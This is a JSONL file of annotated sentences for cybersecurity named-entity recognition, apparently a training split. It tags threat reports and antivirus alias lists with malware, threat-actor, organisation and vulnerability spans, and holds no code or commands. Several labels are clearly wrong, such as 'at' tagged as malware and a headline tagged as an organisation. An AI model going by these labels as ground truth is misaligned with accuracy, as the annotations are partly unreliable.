{"text": "It includes recent incidents as well as older ones that have not been publicly reported; new malware; exploitation, delivery and command and control infrastructure; and the group s modus operandi.", "spans": {"MALWARE: malware;": [[93, 101]], "SYSTEM: command and control infrastructure;": [[129, 164]], "THREAT_ACTOR: the group": [[169, 178]]}, "info": {"id": "cyner2_train_000300", "source": "cyner2_train"}}
{"text": "That domain, electronicfrontierfoundation.org, is designed to trick users into a false sense of trust and it appears to have been used in a spear phishing attack, though it is unclear who the intended targets were.", "spans": {}, "info": {"id": "cyner2_train_000301", "source": "cyner2_train"}}
{"text": "Last week, Unit 42 came across new Disttrack samples that appear to have been used in an updated attack campaign.", "spans": {"ORGANIZATION: Unit 42": [[11, 18]], "MALWARE: Disttrack samples": [[35, 52]], "THREAT_ACTOR: attack campaign.": [[97, 113]]}, "info": {"id": "cyner2_train_000302", "source": "cyner2_train"}}
{"text": "For instance, its JHUHUGIT implant was delivered through a Flash zero-day and used a Windows EoP exploit to break out of the sandbox.", "spans": {"MALWARE: JHUHUGIT implant": [[18, 34]], "VULNERABILITY: Flash zero-day": [[59, 73]], "MALWARE: Windows EoP exploit": [[85, 104]]}, "info": {"id": "cyner2_train_000304", "source": "cyner2_train"}}
{"text": "The group is well resourced, capable of infiltrating multiple targets simultaneously and will often operate outside the working hours of targeted organizations in order to maintain a low profile.", "spans": {"THREAT_ACTOR: The group": [[0, 9]], "ORGANIZATION: organizations": [[146, 159]]}, "info": {"id": "cyner2_train_000306", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TROJ_BREDLAB.SMD Trojan-Spy.Win32.Spenir.as Application.Win32.BlkIC.IMG TROJ_BREDLAB.SMD Backdoor/SdBot.prb HeurEngine.ZeroDayThreat Trojan.Win32.ProcessHijack", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000308", "source": "cyner2_train"}}
{"text": "It continues to spread across small and medium-sized businesses across the globe, using the modular Gorynych/Diamond Fox botnet to exfiltrate stolen data.", "spans": {"ORGANIZATION: small": [[30, 35]], "ORGANIZATION: medium-sized businesses": [[40, 63]], "MALWARE: Gorynych/Diamond Fox botnet": [[100, 127]]}, "info": {"id": "cyner2_train_000310", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Hoax.Win32.ArchSMS!O Trojan.Mobsularch Trojan.ArchSMS.Win32.7426 Trojan/ArchSMS.nkit Win32.Trojan.WisdomEyes.16070401.9500.9644 TROJ_MALICIOUS_BK083028.TOMC Win.Trojan.Archsms-4649 Riskware.Win32.ArchSMS.cqmlwf TrojWare.Win32.Zusy.AJ Trojan.Fraudster.336 Trojan-Banker.Win32.Banbra Hoax.ArchSMS.jho HackTool[Hoax]/Win32.ArchSMS Win32.Troj.Hoax.kcloud Trojan:Win32/Mobsularch.A Trojan.Strictor.548 Win32.Trojan.ArchSMS.D Hoax.ArchSMS.nk Trojan.ArchSMS!pTXIElAMXBk W32/ArchSMS.VU!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000312", "source": "cyner2_train"}}
{"text": "Palo Alto Networks has collected over 20 samples of this particular malware family, and we have identified over $70,000 USD in Bitcoin payments to the attacker Cisco Talos yesterday reported this figure to be closer to $115,000 USD.", "spans": {"ORGANIZATION: Palo Alto Networks": [[0, 18]], "MALWARE: samples": [[41, 48]], "MALWARE: malware family,": [[68, 83]], "THREAT_ACTOR: attacker": [[151, 159]], "ORGANIZATION: Cisco Talos": [[160, 171]]}, "info": {"id": "cyner2_train_000314", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Pitit.A3 HV_ABTITU_CG093139.RDXN TR/Barys.2445.24 Win32.Troj.Undef.kcloud Trojan.Kazy Trojan.Win32.Loader.L", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000316", "source": "cyner2_train"}}
{"text": "A collection of domains registered by Pawn Storm/Sofacy/APT28/Fancy Bear to target organisations", "spans": {"THREAT_ACTOR: Pawn Storm/Sofacy/APT28/Fancy Bear": [[38, 72]], "ORGANIZATION: organisations": [[83, 96]]}, "info": {"id": "cyner2_train_000317", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.CoinMiner.A4 PUP.Optional.ChinAd W32.XiaobaMiner Win32/Oflwr.A!crypt Win.Trojan.Qhost-160 Trojan.Win32.BtcMine.exddfs Tool.BtcMine.1051 BehavesLike.Win32.Ransomware.th W32.Trojan.Qhost RiskWare/Win32.BitMiner.h Trojan.Forcud", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000318", "source": "cyner2_train"}}
{"text": "While it has become common to see new ransomware variants being distributed daily, it is not as common to find new ransomware infections being distributed via exploit kits.", "spans": {"MALWARE: ransomware": [[38, 48], [115, 125]], "MALWARE: exploit kits.": [[159, 172]]}, "info": {"id": "cyner2_train_000319", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.1FBC Win32.Trojan.WisdomEyes.16070401.9500.9950 Win.Exploit.Countdown-1 BackDoor.Meterpreter.37 Troj.W32.Jorik.Skor.lrUS Trojan:Win64/Meterpreter.A Trojan/Win32.Swrort.C695042", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000320", "source": "cyner2_train"}}
{"text": "We previously highlighted the dangers of installing apps that enable IAPs using SMS messages, as these apps typically have access to all SMS messages sent to the phone.", "spans": {"VULNERABILITY: that enable IAPs using SMS messages,": [[57, 93]], "VULNERABILITY: access to all SMS messages": [[123, 149]]}, "info": {"id": "cyner2_train_000321", "source": "cyner2_train"}}
{"text": "U.S. Allies and Rivals Digest Trump's Victory - Carnegie Endowment for International Peace.docm", "spans": {"ORGANIZATION: U.S. Allies": [[0, 11]], "ORGANIZATION: Rivals Digest Trump's Victory": [[16, 45]]}, "info": {"id": "cyner2_train_000322", "source": "cyner2_train"}}
{"text": "During the course of our research, it became evident that this actor had not built uWarrior from scratch, but rather opted to borrow components from several off-the-shelf tools.", "spans": {"ORGANIZATION: actor": [[63, 68]], "MALWARE: uWarrior": [[83, 91]], "MALWARE: off-the-shelf tools.": [[157, 177]]}, "info": {"id": "cyner2_train_000325", "source": "cyner2_train"}}
{"text": "Hackers made a modified Linux Mint ISO, with a backdoor in it, and managed to hack the Linux Mint website to point to it.", "spans": {"THREAT_ACTOR: Hackers": [[0, 7]], "SYSTEM: Linux Mint ISO,": [[24, 39]], "MALWARE: backdoor": [[47, 55]]}, "info": {"id": "cyner2_train_000326", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Dropper.Win32.BindFile!O Trojan/Dropper.BindFile.a W32/Dropper.LIP Trojan.Spy-681 Trojan-Dropper.Win32.BindFile.e Trojan.Win32.BindFile.dcyo Trojan.Win32.BindFile.188416 PE:Dropper.BindFile.h!1173781522 TrojWare.Win32.TrojanDropper.BindFile.A Trojan.Progress.10 TrojanDropper.ExeBind.Mfc2 Dropper/Bindfile.496648 W32/Risk.SLHR-7237 Win32/TrojanDropper.BindFile.A Trojan-Dropper.Win32.BindFile W32/BindFile.A!tr Trojan.Win32.BindFile.bA", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000328", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Kryptik.aspo JAVA_EXPLOIT.TCC JAVA_EXPLOIT.TCC Win.Trojan.Hydraq-219 Exploit.Java.CVE20131493.cqvzpg Java.S.EX-CVE-2013-1493.206981 Exploit.Java.509 EXP/Java.HLP.JM W32/Kryptik.ASPO Trojan.Graftor.D13511 Exploit.Java.CVE-2013-1493 Java/Exploit.CVE-2013-1493.AL Unk.Win32.Script.400440 Trojan.Plugax!dr/f2r5A7aY Exploit.Java.HLP virus.java.cve-2013-1493.c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000330", "source": "cyner2_train"}}
{"text": "We have seen Angler to be using bedep as its payload but adding vawtrak in its arsenal is something we haven't seen in the past until recently.", "spans": {"MALWARE: Angler": [[13, 19]], "MALWARE: bedep": [[32, 37]], "MALWARE: payload": [[45, 52]], "MALWARE: vawtrak": [[64, 71]]}, "info": {"id": "cyner2_train_000331", "source": "cyner2_train"}}
{"text": "Attackers have been able to successfully implant JavaScript code on the login pages that enables them to surreptitiously steal employee credentials as they login to access internal corporate resources.", "spans": {"THREAT_ACTOR: Attackers": [[0, 9]]}, "info": {"id": "cyner2_train_000332", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Dropper BKDR_QBOT.SM Win32.Trojan-Dropper.Small.s Win32/Qakbot.KR BKDR_QBOT.SM Trojan.Win32.Gamania.tghgw Trojan.Win32.A.Mbro.191488 Trojan.PWS.Gamania.36525 W32/Trojan.XMWQ-0223 Trojan[Backdoor]/Win32.QBot TrojanDropper:Win32/Qakbot.A Dropper/Win32.Injector.R30051 Win32/TrojanDropper.Small.NMS Trojan.Kryptik!nABTr99RVjs Backdoor.Win32.Qakbot W32/Dropper.NMS!tr Win32/Trojan.a58", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000335", "source": "cyner2_train"}}
{"text": "As of September 17th Dyreza now counts an additional twenty organizations directly involved in Fulfillment and Warehousing; four software companies that support Fulfillment and Warehousing; five Wholesale Computer Distributors; and its credential theft triggers include Apple, Iron Mountain, OtterBox and Badge Graphics Systems and many other well-known consumer- and business-facing technology and service brands.", "spans": {"MALWARE: Dyreza": [[21, 27]], "ORGANIZATION: organizations": [[60, 73]], "ORGANIZATION: Fulfillment": [[95, 106], [161, 172]], "ORGANIZATION: Warehousing;": [[111, 123], [177, 189]], "ORGANIZATION: software companies": [[129, 147]], "ORGANIZATION: Wholesale Computer Distributors;": [[195, 227]], "ORGANIZATION: Apple, Iron Mountain, OtterBox": [[270, 300]], "ORGANIZATION: Badge Graphics Systems": [[305, 327]], "ORGANIZATION: consumer-": [[354, 363]], "ORGANIZATION: business-facing technology": [[368, 394]], "ORGANIZATION: service brands.": [[399, 414]]}, "info": {"id": "cyner2_train_000338", "source": "cyner2_train"}}
{"text": "This malware possesses the ability to Collect information about an infected computer and transfer it to the command and control server.", "spans": {"MALWARE: malware": [[5, 12]], "SYSTEM: infected computer": [[67, 84]]}, "info": {"id": "cyner2_train_000339", "source": "cyner2_train"}}
{"text": "Malware isn't usually thought to be old, but a recent phishing campaign using the MyDoom worm has shown that old tools can still be used to lure users into malware.", "spans": {"MALWARE: Malware": [[0, 7]], "THREAT_ACTOR: phishing campaign": [[54, 71]], "MALWARE: the MyDoom worm": [[78, 93]], "MALWARE: malware.": [[156, 164]]}, "info": {"id": "cyner2_train_000340", "source": "cyner2_train"}}
{"text": "SSL is typically used to encrypt data between the client and the server, thus making the content unreadable by any systems sitting between the two end points, and significantly raising the cost of defence.", "spans": {}, "info": {"id": "cyner2_train_000342", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Zapchast.113152 Backdoor.KeyBoy Trojan.Zapchast.Win32.29227 Trojan.Heur.LP.EDDB38 Win32.Trojan.WisdomEyes.151026.9950.9999 Backdoor.Kboy Trojan.Win32.Zapchast.afhn Trojan.Win32.Zapchast.cjltha Win32.Trojan.Zapchast.Htcu BehavesLike.Win32.GameVance.ch Trojan/Zapchast.iik TR/Spy.113152.29 Trojan/Win32.Zapchast Backdoor.Win32.KeyBoy.113152[h] Win-Trojan/Keyboy.113152 Trojan.Win32.Zapchast.afhn Trojan.Zapchast!0ThicNhZU3g Trojan.Win32.Zapchast W32/Zapchast.AFHN!tr Win32/Trojan.020", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000343", "source": "cyner2_train"}}
{"text": "Bot communicates with the botmaster using non-standard protocol built on top of TCP.", "spans": {"MALWARE: Bot": [[0, 3]], "MALWARE: botmaster": [[26, 35]]}, "info": {"id": "cyner2_train_000344", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.QQKiller.183808 Trojan.Qqkiller.A Trojan.QQKiller.Win32.2 Trojan.Qqkiller.A Trojan/QQKiller.a Trojan.QQKiller!Y2SikmBtqEk Win32/QQKiller.A TROJ_QQKILLER.A Trojan.Win32.QQKiller.a Trojan.Win32.QQKiller.erxn Trojan.Win32.A.QQKiller.183808[h] Trojan.Qqkiller.A TrojWare.Win32.QQKiller.A Trojan.Qqkiller.A Trojan.Nudeq TROJ_QQKILLER.A BehavesLike.Win32.HLLPPhilis.cc W32/Trojan.ELFE-7308 Trojan/Win32.QQKiller TR/QQKiller.2 W32/GWGhost.A!tr Trojan/Win32.QQKiller Trojan.Qqkiller.A Troj.W32.QQKiller.a!c Win-Trojan/QQKiller.183808 Trojan.QQKiller Win32.Trojan.Qqkiller.Szkz Trojan.Win32.QQKiller Trojan.Qqkiller.A Trojan.Win32.QQKiller.a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000345", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Duqu.24960.B Trojan.Win32.Duqu!O Trojan/Duqu.a Trojan.Duqu.1 Win32.Trojan.WisdomEyes.16070401.9500.9896 W32/Duqu.C W32.Duqu Win32/Duqu.A RTKT_DUQU.SME Win.Trojan.Duqu-7 Trojan.Win32.Duqu.a Trojan.Win32.Duqu.eorzg Trojan.Win32.Duqu.24960 TrojWare.Win32.Duqu.A Trojan.Duqu.2 Trojan.Duqu.Win32.2 RTKT_DUQU.SME W32/Duqu.BOQU-9196 Trojan/Duqu.b TR/Duqu.A.1 Trojan/Win32.Duqu Trojan:WinNT/Duqu.B Troj.W32.Duqu.a!c Trojan.Win32.Duqu.a Trojan/Win32.Duqu.R13984 Trojan.Duqu.2102 Win32/Duqu.A Win32.Trojan.Duqu.Pjnh Trojan.Duqu!o6SU6/Pq/F4 Trojan.Win32.Duqu W32/Duqu.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000346", "source": "cyner2_train"}}
{"text": "The malware takes these steps : Check if the system master boot record ( MBR ) contains an infection marker ( 0xD289C989C089 8-bytes value at offset 0x2C ) , and , if so , terminate itself Check again if the process is attached to a debugger ( using the techniques described previously ) Read , decrypt , and map the stage 5 malware ( written in the previous stage in msvcr90.dll ) Open winlogon.exe process Load user32.dll system library and read the KernelCallbackTable pointer from its own process environment block ( PEB ) ( Note : The KernelCallbackTable points to an array of graphic functions used by Win32 kernel subsystem module win32k.sys as call-back into user-mode .", "spans": {}, "info": {"id": "cyner2_train_000348", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Downloader.Win32.Gamarue.2!O Trojan.Shamoon.1 trojan.win32.skeeyah.a!bit Win32.Trojan.WisdomEyes.16070401.9500.9991 W32.Disttrack.B WORM_DISTTRACK.SMC Win.Dropper.DistTrack-5744784-0 Backdoor.Win32.RemoteConnection.d Trojan.Win32.RemoteConnection.ekxrsg WORM_DISTTRACK.SMC Backdoor.RemoteConnection.a Trojan[Backdoor]/Win32.RemoteConnection Trojan:Win32/Depriz.E!dha Backdoor/Win32.RemoteConnection.C1761738 Backdoor.RemoteConnection!lEVCTonUnuw Trojan.Win32.Depriz Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000351", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Winsy Trojan.Win32.Winsy Trojan.Winsy Trojan.Winsy W32/Trojan.MBSD-8108 Trojan.Winsy Trojan.Win32.Winsy Trojan.Winsy Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000354", "source": "cyner2_train"}}
{"text": "The DGA hosted site further serves up a list of domains that are cycled through for C2.", "spans": {}, "info": {"id": "cyner2_train_000355", "source": "cyner2_train"}}
{"text": "Today's blog reviews recent activity from these EITest HoeflerText popups on August 30, 2017 to discover more about this recent change.", "spans": {}, "info": {"id": "cyner2_train_000359", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Exploit.DebPloit.A Trojan-Exploit/W32.DebPloit.45056 Exploit.DebPloit.Win32.4 Trojan/Exploit.DebPloit Trojan.Exploit.DebPloit.A Trojan.Exploit.DebPloit.A Exploit.DebPloit!VRtQm5q2mnY TROJ_DEPLOIT.A Exploit.Win32.DebPloit Exploit.Win32.DebPloit.yfoid Exploit.DebPloit.45056[h] Trojan.Exploit.DebPloit.A TrojWare.Win32.Exploit.DebPloit Trojan.Exploit.DebPloit.A BackDoor.Bifrost.634 TROJ_DEPLOIT.A W32/Risk.CTWU-4612 Exploit.WinNT.DebPloit Trojan[Exploit]/Win32.DebPloit WinNT.Hack.DebPloit.kcloud Win-Trojan/Debploit.45056.B Trojan.Exploit.DebPloit.A Trojan.Exploit.DebPloit.A Win32/Exploit.DebPloit Win32.Exploit.Debploit.Wptu W32/Debploit.B!tr Exploit.OY Trojan.Win32.DebPloit.aa Win32/Trojan.Exploit.672", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000360", "source": "cyner2_train"}}
{"text": "Around New Year, the Emsisoft Lab team was alerted to the presence of a new Globe variant, Globe3, which was infecting users using a new mode of operation.", "spans": {"ORGANIZATION: Emsisoft Lab team": [[21, 38]], "MALWARE: Globe": [[76, 81]], "MALWARE: Globe3,": [[91, 98]], "ORGANIZATION: users": [[119, 124]]}, "info": {"id": "cyner2_train_000361", "source": "cyner2_train"}}
{"text": "The DNS protocol is unlikely to be blocked allowing free communications out of the network and its use is unlikely to raise suspicion among network defenders.", "spans": {"SYSTEM: DNS": [[4, 7]], "VULNERABILITY: protocol is unlikely to be blocked": [[8, 42]], "VULNERABILITY: free communications out of the network": [[52, 90]]}, "info": {"id": "cyner2_train_000363", "source": "cyner2_train"}}
{"text": "Phishing targeting Google Docs", "spans": {"SYSTEM: Google Docs": [[19, 30]]}, "info": {"id": "cyner2_train_000366", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/W32.Shiz.102400.S Backdoor.Win32.Shiz!O Backdoor/Shiz.fhrr Win32.Trojan.WisdomEyes.16070401.9500.9971 Win.Trojan.Shiz-787 Trojan.Win32.Shiz.whgln Trojan.KeyLogger.14845 Backdoor.Shiz.Win32.3116 BehavesLike.Win32.BadFile.cm Backdoor.Win32.Shiz Backdoor/Shiz.edz TR/Rogue.kdz.957021 Trojan[Backdoor]/Win32.Shiz Trojan.Zusy.D419A Trojan:Win32/Nahip.A Backdoor/Win32.Shiz.R34442 Win32/Spy.KeyLogger.NWE W32/KeyLogger.AFN!tr Backdoor.Shiz Win32/Trojan.460", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000367", "source": "cyner2_train"}}
{"text": "In one case, the casino website was a direct gateway to Angler EK.", "spans": {"MALWARE: Angler EK.": [[56, 66]]}, "info": {"id": "cyner2_train_000370", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.JS.Redirector.xb Js.Trojan.Redirector.Amwl JS/BlacoleRef.CZ.26 Trojan/JS.Redirector.xb Trojan.JS.Redirector.xb Exploit.JS.Blacole JS/Iframe.WOR!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000374", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Aphexdoor.Litesock.A Backdoor/W32.Aphexdoor.23040 Trojan.Suckspro Backdoor.Aphexdoor.Win32.24 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Backdoor.YGRL-7760 Backdoor.Trojan Win32/Porsux.A Win.Trojan.Aphexdoor-8 Backdoor.Aphexdoor.Litesock.A Backdoor.Win32.Aphexdoor.LiteSock Backdoor.Aphexdoor.Litesock.A Trojan.Win32.Aphexdoor.ebrvay Backdoor.W32.Aphexdoor.LiteSock!c Backdoor.Aphexdoor.Litesock.A Backdoor.Aphexdoor.Litesock.A BackDoor.LiteSock BehavesLike.Win32.Downloader.mm Backdoor.Win32.Aphexdoor.LiteSock W32/Backdoor2.EYIV Backdoor/Aphexdoor.LiteSock Trojan[Backdoor]/Win32.Aphexdoor Backdoor.Aphexdoor.Litesock.A Backdoor.Win32.Aphexdoor.LiteSock Worm/Win32.Fesber.C58465 Backdoor.Aphexdoor.Litesock.A BScope.Trojan.RSP Bck/Corsbot.B Win32.Backdoor.Aphexdoor.Airh Trojan.Suckspro!fID1dcqse2s W32/Aphexdoor.LITESOCK!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000375", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm.Win32.Chiviper!O Worm.AutoRun.14759 W32/AutoRun.sdc Win32.Trojan.WisdomEyes.16070401.9500.9975 WORM_OTORUN.SMIF Win.Trojan.Qhost-160 Worm.Win32.Chiviper.gk Trojan.Win32.AutoRun.onby Trojan.AVKill.11726 Worm.AutoRun.Win32.23223 WORM_OTORUN.SMIF BehavesLike.Win32.Ipamor.qt Worm.Win32.AutoRun WORM/Autorun.rmr win32.troj.onlinegamest.bc.kcloud Worm.Win32.Chiviper.gk Trojan/Win32.CSon.R2002 Worm.Chiviper Worm.AutoRun!t3rz8tcZQ1A W32/Chiviper.GK!worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000377", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Zbot.7 Win32.Trojan.WisdomEyes.16070401.9500.9999 Win.Trojan.Kazy-50 Trojan.Win32.Pamela.hnatv Trojan.Win32.A.Inject.75189 DDoS.Pamela Trojan.Inject.Win32.17142 BehavesLike.Win32.Dropper.pc Trojan.Win32.Inject Trojan/Inject.mra Trojan/Win32.Inject Trojan:Win32/Pucodex.A Trojan-Injector.191245", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000378", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm/W32.Sober.135968 Packed.Win32.TDSS!O Worm.Sober.Win32.7 WORM_SOBER.AM Win32.Trojan.WisdomEyes.16070401.9500.9997 W32/Sober.DVXC-4063 W32.Sober.W@mm Win32/Sober.T WORM_SOBER.AM Win.Worm.Sober-43 Email-Worm.Win32.Sober.x Trojan.Win32.Sober.fxvm I-Worm.Win32.Sober.T Packer.W32.Tibs.l4Hz Worm.Win32.Sober.V Win32.HLLM.Sober BehavesLike.Win32.Autorun.cc Trojan.Win32.Pasta W32/Sober.V@mm I-Worm/Sober.p DR/Sober.T Worm[Email]/Win32.Sober Worm.Sober.t.kcloud Worm:Win32/Sober.Y@mm.dr Email-Worm.Win32.Sober.x Dropper/Win32.Sober.R86508 W32/Sober.s.dr TScope.Trojan.VB W32/Sober.AE.worm Win32/Sober.V Win32.Worm-email.Sober.Akew I-Worm.Sober.AF1 W32/Sober.T@mm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000379", "source": "cyner2_train"}}
{"text": "Proofpoint is tracking this attacker, believed to operate out of China, as TA459", "spans": {"ORGANIZATION: Proofpoint": [[0, 10]], "THREAT_ACTOR: attacker,": [[28, 37]], "THREAT_ACTOR: TA459": [[75, 80]]}, "info": {"id": "cyner2_train_000381", "source": "cyner2_train"}}
{"text": "360 Network Security Research Lab recently discovered a new botnet that is scanning the entire Internet on a large scale.", "spans": {"ORGANIZATION: 360 Network Security Research Lab": [[0, 33]], "MALWARE: botnet": [[60, 66]]}, "info": {"id": "cyner2_train_000384", "source": "cyner2_train"}}
{"text": "The malware has existed since at least 2012, with threat actors using it for mass-spreading malware campaigns and for ongoing targeted attacks.", "spans": {"MALWARE: malware": [[4, 11]], "THREAT_ACTOR: threat actors": [[50, 63]], "THREAT_ACTOR: mass-spreading malware campaigns": [[77, 109]]}, "info": {"id": "cyner2_train_000387", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.CareFree.a Win32/Tnega.TaRMRTC Trojan.Win32.Graftor.dogten Trojan.KillFiles.21059 BehavesLike.Win32.Downloader.mc TR/Graftor.cpoyxe Trojan.Ursu.D2DC2 Trojan/Win32.StartPage.R131400 Win32/Trojan.e36", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000390", "source": "cyner2_train"}}
{"text": "This group has been active since at least 2014 and uses spear-phishing campaigns to target enterprises.", "spans": {"THREAT_ACTOR: group": [[5, 10]], "MALWARE: at": [[33, 35]], "THREAT_ACTOR: spear-phishing campaigns": [[56, 80]], "ORGANIZATION: target enterprises.": [[84, 103]]}, "info": {"id": "cyner2_train_000391", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9992 Trojan-Spy.MSIL.KeyLogger.ctnb Trojan.Win32.Z.Keylogger.91136.M Msil.Trojan-spy.Keylogger.Wqde Trojan.DownLoader9.24657 TrojanSpy.MSIL.vlt TR/Downloader.gldnp Trojan[Spy]/MSIL.KeyLogger Trojan.MSILPerseus.D9E17 Trojan-Spy.MSIL.KeyLogger.ctnb Backdoor:MSIL/Cooatut.A TrojanSpy.MSIL.KeyLogger Trj/CI.A MSIL/Troob.AA Trojan.MSIL.Troob MSIL/Troob.AA!tr Win32/Trojan.Spy.144", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000392", "source": "cyner2_train"}}
{"text": "Instead, MacDownloader is a simple exfiltration agent, with broader ambitions.", "spans": {"MALWARE: MacDownloader": [[9, 22]]}, "info": {"id": "cyner2_train_000393", "source": "cyner2_train"}}
{"text": "Throughout 2016, Proofpoint researchers tracked a cyber-espionage campaign targeting victims in Russia and neighboring countries.", "spans": {"ORGANIZATION: Proofpoint researchers": [[17, 39]], "THREAT_ACTOR: cyber-espionage campaign": [[50, 74]]}, "info": {"id": "cyner2_train_000394", "source": "cyner2_train"}}
{"text": "This threat actor has been very active in February and March 2023 targeting individuals in various South Korean organizations.", "spans": {"THREAT_ACTOR: threat actor": [[5, 17]], "ORGANIZATION: individuals": [[76, 87]], "ORGANIZATION: South Korean organizations.": [[99, 126]]}, "info": {"id": "cyner2_train_000395", "source": "cyner2_train"}}
{"text": "The Trojan is delivered in emails that mostly target corporate users.", "spans": {"MALWARE: The Trojan": [[0, 10]], "ORGANIZATION: corporate users.": [[53, 69]]}, "info": {"id": "cyner2_train_000396", "source": "cyner2_train"}}
{"text": "We can trace activities of Pawn Storm back to 20041 and before our initial report in 2014 there wasn't much published about this actor group.", "spans": {"THREAT_ACTOR: Pawn Storm": [[27, 37]], "THREAT_ACTOR: actor group.": [[129, 141]]}, "info": {"id": "cyner2_train_000397", "source": "cyner2_train"}}
{"text": "Backdoor.Win32.Denis uses DNS tunneling for communication", "spans": {}, "info": {"id": "cyner2_train_000398", "source": "cyner2_train"}}
{"text": "A few days before the Kuala Lumpur summit, a subdomain under asean.org for the ASEAN Secretariat Resource Centre ARC was compromised.", "spans": {"ORGANIZATION: Kuala Lumpur summit,": [[22, 42]], "ORGANIZATION: the ASEAN Secretariat Resource Centre ARC": [[75, 116]]}, "info": {"id": "cyner2_train_000399", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Flooder.MailSpam.AnonMail.A Email-Flooder.Win32.AnonMail!O Win32.Trojan.Anonmail.Agkt Flooder.MailSpam.AnonMail.A W32/Backdoor.SPH Hacktool.Flooder Win.Tool.MailSpam-3 Email-Flooder.Win32.AnonMail.a Flooder.MailSpam.AnonMail.A Trojan.Win32.AnonMail.dbio TrojWare.Win32.Spammer.AnonMail Trojan.AnMail Tool.AnonMail.Win32.14 Email-Flooder.Win32.AnonMail.A W32/Backdoor.CDAV-2869 Spammer.Mail.AnonMail TR/Nuker.AnonMail HackTool[Flooder]/Win32.AnonMail Email-Flooder.Win32.AnonMail.a Flooder.MailSpam.AnonMail.A Spammer.AnonMail Flooder.MailSpam.AnonMail.A Flooder.MailSpam.AnonMail.A Trj/CI.A Win32/Spammer.AnonMail", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000400", "source": "cyner2_train"}}
{"text": "the type of operation they are carrying out.", "spans": {}, "info": {"id": "cyner2_train_000401", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Mlw.eweujb Win32.Trojan.Inject.Auto BehavesLike.Win32.Trojan.hh TR/Dropper.MSIL.fkvxc Spyware.InfoStealer Trojan.MSIL.Inject MSIL/Injector.SZD!tr Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000403", "source": "cyner2_train"}}
{"text": "Little has been published on the threat actors responsible for Operation Ke3chang since the report was released more than two years ago.", "spans": {"THREAT_ACTOR: threat actors": [[33, 46]], "THREAT_ACTOR: Operation": [[63, 72]]}, "info": {"id": "cyner2_train_000405", "source": "cyner2_train"}}
{"text": "A backdoor also known as: PUP.Optional.VideiPlayer Trojan.ExtenBro! TROJ_SPNR.06HH14 Trojan-Downloader.MSIL.ExtInstall.o Trojan.Win32.Kivat.dfxucy TROJ_SPNR.06HH14 BehavesLike.Win32.Trojan.nt W32/Trojan.JMSU-4938 Variant.Kazy.doi W32/ExtenBro.E!tr Trojan.Kazy.D683A9 Uds.Dangerousobject.Multi!c TrojanDownloader:MSIL/Kivat.B Trojan.ExtenBro! Trj/Chgt.B Win32/Trojan.Multi.daf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000407", "source": "cyner2_train"}}
